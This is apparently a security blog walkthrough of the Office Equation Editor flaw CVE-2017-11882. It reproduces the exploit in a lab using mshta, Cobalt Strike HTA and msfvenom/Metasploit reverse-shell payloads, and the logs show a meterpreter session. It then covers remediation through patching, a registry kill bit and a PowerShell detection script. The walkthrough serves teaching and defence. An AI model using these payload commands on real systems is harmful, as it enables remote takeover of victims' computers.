CVE-2017-11882 has been getting a lot of attention lately. For a detailed analysis of the vulnerability see: PoC sample analysis of the Office remote code execution vulnerability hidden for 17 years (CVE-2017-11882).

On the 20th someone shared a PoC on Twitter (Twitter link, PoC link), and later someone shared a project, CVE-2017-11882, which achieves command execution by modifying an RTF file. It has one drawback: the project fetches the remote file over WebDAV, and the command that can be executed is limited to 43 bytes.

Evi1cg later modified the PoC. It is convenient and simple to use, and adds a 109-byte variant of the script. GitHub: https://github.com/Ridter/CVE-2017-11882

Environment

Host: 192.168.43.100. Virtual machine: Microsoft Windows 7 Ultimate Service Pack 1, 192.168.43.103. Office: 2016.

Usage?

python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

use mshta

python Command43b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

Demo

[screenshot: CVE-2017-11881-1.png]

[screenshot: CVE-2017-11881-2.png]

Using Cobalt Strike

Add a windows/beacon_http/reverse_http listener;

[screenshot: CVE-2017-11883-3.png]

Under Attacks - Packages - HTML Application, choose the VBS method and click Generate to produce the HTA backdoor file;

Start a temporary web server with php -S 192.168.43.100:8000;

python -m SimpleHTTPServer 8000 works as well.

Then generate the doc file with Evi1cg's script;

[screenshot: CVE-2017-11882-6.png]

HTA files are interpreted by mshta, and mshta.exe ships with Windows, so the payload can be invoked and run directly without any AV evasion;

Open the doc with Office in the virtual machine and the host checks in;

[screenshot: CVE-2017-11883-5.png]

Using Metasploit

Generate an HTA payload file with msfvenom;

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.100 lport=4444 -f hta-psh > abc.hta  

[screenshot: CVE-2017-11882-7.png]

Then just start the handler;

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.43.100
LHOST => 192.168.43.100
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.43.100:4444 

The reverse shell comes back and we land in meterpreter;

[screenshot: CVE-2017-11882-8.png]

PS_shell

Chamd5's msf module, which starts the HTTP server locally on its own; very convenient;

msf > search PS_shell

Matching Modules
================

   Name                      Disclosure Date  Rank    Description
   ----                      ---------------  ----    -----------
   exploit/windows/PS_shell                   normal  Microsoft Office Payload Delivery


msf > use exploit/windows/PS_shell
msf exploit(PS_shell) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf exploit(PS_shell) > back
msf > use exploit/windows/PS_shell
msf exploit(PS_shell) > show options 

Module options (exploit/windows/PS_shell):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.43.100
lhost => 192.168.43.100
msf exploit(PS_shell) > set uri
set urihost  set uripath  set uriport  
msf exploit(PS_shell) > set uripath abc
uripath => abc
msf exploit(PS_shell) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.43.100:4444 
msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://192.168.43.100:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.43.100:8080/abc"

Generate the exploit document with Command43b_CVE-2017-11882.py;

➜  CVE-2017-11882 git:(master) ✗ python Command43b_CVE-2017-11882.py -c "mshta.exe http://192.168.43.100:8080/abc" -o test.doc
[*] Done ! output file --> test.doc

Open it and the session comes in;

msf exploit(PS_shell) > 
[*] Sending stage (179267 bytes) to 192.168.43.103
[*] Meterpreter session 1 opened (192.168.43.100:4444 -> 192.168.43.103:50160) at 2017-11-30 09:13:13 +0800

msf exploit(PS_shell) > sessions 

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  Go0s-PC\Go0s @ GO0S-PC  192.168.43.100:4444 -> 192.168.43.103:50160 (192.168.43.103)

msf exploit(PS_shell) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1304 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami
whoami
go0s-pc\go0s

Affected versions

It is fair to say that every version is affected;

Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016

Remediation

1. Microsoft has released a fix for this vulnerability.

(1) Download the update from https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 and install it;

(2) Enable Windows Update so the system is patched automatically on a regular basis;

2. Since the Equation Editor has gone 17 years without an update and may well contain many more vulnerabilities, it is recommended to disable the component by unregistering it in the registry.

Press Win+R and open cmd.exe;

Substitute your Office version for XX.X in the registry paths below, then run:

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
 
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
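The two reg add commands above require you to know which XX.X version keys exist on the machine and to remember the Wow6432Node hive on 64-bit Windows. The PowerShell script below is an added example, not part of the original post or of the Ridter project: it discovers every Office version key under both hives, reports whether the 0x400 kill bit is already present for the Equation Editor CLSID from the post, and ORs the bit in rather than overwriting any flags already set. The function names and the -Check switch are this example's own.

```powershell
# Added example (not from the original post): set the Equation Editor COM kill bit
# (Compatibility Flags 0x400) for every Office version key present, covering both the
# native hive and Wow6432Node, instead of editing the XX.X placeholder by hand.
$EquationEditorClsid = '{0002CE02-0000-0000-C000-000000000046}'   # CLSID as given in the post
$OfficeRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Office',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office'
)

function Get-EquationEditorCompatKeys {
    foreach ($root in $OfficeRoots) {
        if (-not (Test-Path $root)) { continue }
        # Version subkeys are named like 12.0, 14.0, 15.0, 16.0 (the post's XX.X).
        Get-ChildItem -Path $root -ErrorAction SilentlyContinue |
            Where-Object { $_.PSChildName -match '^\d+\.\d+$' } |
            ForEach-Object { "Registry::$($_.Name)\Common\COM Compatibility\$EquationEditorClsid" }
    }
}

function Set-EquationEditorKillBit {
    param([switch]$Check)   # -Check only reports the current state and changes nothing
    foreach ($key in Get-EquationEditorCompatKeys) {
        $current = 0
        if (Test-Path $key) {
            $item = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
            if ($item) { $current = [int]$item.'Compatibility Flags' }
        }
        $disabled = ($current -band 0x400) -ne 0
        if ($Check) {
            [pscustomobject]@{ Key = $key; Flags = ('0x{0:X}' -f $current); KillBitSet = $disabled }
            continue
        }
        if ($disabled) { continue }
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the bit in so that any compatibility flags already present are preserved.
        $new = $current -bor 0x400
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Type DWord -Value $new
        [pscustomobject]@{ Key = $key; Flags = ('0x{0:X}' -f $new); KillBitSet = $true }
    }
}

# Run from an elevated PowerShell: preview first, then apply.
Set-EquationEditorKillBit -Check | Format-Table -AutoSize
# Set-EquationEditorKillBit | Format-Table -AutoSize
```

Run the -Check form first from an elevated prompt and confirm the keys it lists are the ones you expect; then run it without -Check to apply. The trade-off is the same as for the manual reg add: with the kill bit set, existing documents containing legacy Equation 3.0 objects can no longer open or edit those objects, so test on a representative machine before rolling out.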

3. Huorong did not alert on it at all... but 360 reportedly blocks mshta execution outright and shows a prompt;
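Whether or not a given AV product happens to block mshta, the durable signal in this chain is the process tree: the post's payloads ("cmd.exe /c calc.exe", "mshta http://...") all run as children of the Equation Editor, which in normal use spawns nothing. The script below is an added example, not part of the original post or of any tool it mentions: it runs over a handful of constructed process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) and flags any child of EQNEDT32.EXE, rating it higher when the command line carries a URL or UNC path, which is how the HTA and WebDAV variants in the post are delivered. The record values, the function name and the severity labels are this example's own.

```powershell
# Added example (not from the original post): detect the Equation Editor spawning a child
# process, the behaviour produced by the exploit chain described above.
# These records are constructed for the example; they mimic Sysmon Event ID 1 fields.
$SampleEvents = @(
    [pscustomobject]@{ ParentImage = 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE'
                       Image       = 'C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE'
                       CommandLine = '"EQNEDT32.EXE" -Embedding' },
    [pscustomobject]@{ ParentImage = 'C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe http://192.168.43.100:8080/abc' },
    [pscustomobject]@{ ParentImage = 'C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE'
                       Image       = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe /c calc.exe' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe C:\Users\go0s\Desktop\local.hta' }
)

function Find-EquationEditorChildren {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $parent = [IO.Path]::GetFileName($e.ParentImage)
        # Equation Editor legitimately spawns no child processes, so any child is suspicious.
        if ($parent -ine 'EQNEDT32.EXE') { continue }
        $child = [IO.Path]::GetFileName($e.Image)
        # A URL or UNC path on the command line indicates remote payload delivery (HTA over HTTP,
        # or the WebDAV variant), which is the higher-confidence case.
        $remote = $e.CommandLine -match 'https?://|\\\\[^\\]+\\'
        [pscustomobject]@{
            Severity    = if ($remote) { 'high' } else { 'medium' }
            Parent      = $parent
            Child       = $child
            CommandLine = $e.CommandLine
        }
    }
}

# Expected: the mshta http://... record is 'high', the cmd.exe /c calc.exe record is 'medium',
# and the two other records (WINWORD launching EQNEDT32, explorer launching mshta) are not flagged.
Find-EquationEditorChildren -Events $SampleEvents | Format-Table -AutoSize
```

On a real host the same function can be fed objects built from Get-WinEvent against the Sysmon operational log (Event ID 1), mapping the ParentImage, Image and CommandLine fields from the event's properties; the last sample record is there to show that mshta launched from Explorer is not flagged by this rule, since the parent, not mshta itself, is what makes the chain distinctive.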